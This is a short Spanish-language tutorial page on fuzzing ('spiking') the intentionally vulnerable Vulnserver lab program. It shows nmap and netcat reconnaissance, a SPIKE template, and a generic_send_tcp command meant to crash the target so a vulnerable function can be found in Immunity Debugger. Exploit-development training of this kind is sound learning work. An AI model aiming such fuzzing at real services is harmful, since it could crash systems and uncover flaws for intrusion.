Spiking
Conectarse y listar funciones....
# nmap -sV -sC -p2233 192.168.240.10 -v
Nmap scan report for 192.168.240.10
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
2233/tcp open infocrypt?
# nc -nv 192.168.240.10 2233
Welcome to Vulnerable Server! Enter HELP for help.
HELP
Valid Commands:
HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT
Probar cada una con Immunity Debugger para identificar la funcion vulnerable:
s_readline():
s_string("FUNCION ");
s_string_variable("0");
Con este comando se busca que el serividor victima explote con la funcion:
generic_send_tcp 192.168.174.136 9999 func.spk 0 0
Última actualización
¿Te fue útil?